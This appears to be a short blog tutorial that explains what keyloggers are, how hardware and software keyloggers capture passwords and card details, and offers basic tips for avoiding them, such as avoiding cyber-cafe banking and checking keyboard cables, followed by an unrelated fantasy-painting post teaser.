How to be safe from keyloggers and What to do in such Situations?


keyloggers In this tutorial i am going to talk about the most use piece of software besides from RAT by hackers to observe your activities on your computer and that is keyloggers. A keylogger is a software or hardware device which monitors each and every key typed by you on your keyboard. I am going to talk about different types of keylogger and how to be safe from keyloggers. So lets learn somthing about keyloggers.



1. What is keylogger ?

You might have heard about keyloggers but really dont know what they are, and by now reading this article you will be clear in your mind what does a keylogger do? A keylogger also known as keystroke logger is a type of software though which it monitors each and every key typed by you on your keyboard. You will always fail identify the presence of a keylogger on your computer since it always runs on background and this stuff is never listed in task manager or control panel. This is usually used by parents to keep eye on their children or company owner to spy on their employes.

2. How it can harm you?

Well it can harm you in different ways lets say it can be used by an enemy or friend to get your sensitive information like username and password on some website, Bank credit card details, or any other activities you do on your computer

To be very clear lets say you login to you yahoo account from a computer in which the keylogger is installed then your username and password will be captured and used by the person who captured it and thus mis-use it.

3. Types Of Keyloggers

There are two types of keylogger
  1. Hardware Keylogger
  2. Software Keylogger
Software Keylogger is installed in your computer where as a hardware keylogger is attached to the keyboard. Looking at the below image will clear your mind



4. How to Protect yourself from keyloggers?

Keylogger can be used by your enemy to get sensitive information such as your Bank credit card details, or password to any social networking site, or any other site. In order to be safe keep following points in your mind.

  1. Never use your online banking from cyber cafe. If you want to use then you can try this method, open notepad and type anything then copy and paste each and every word that comes in your username or password.
  2. You can even use above method to protect your facebook profile, yahoo or gmail id.
  3. When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. It looks quite similar to the above image.

0 comments:

Create a Painting Of Fantasy Warrior

Who does not like fantasy and the girls specially fantasy girls, not many people know how to draw them and do face some terrible troubles. Well Follow this tutorial and hopefully you'll learn a lot about painting your own fantasy character!
Learn more »

0 comments: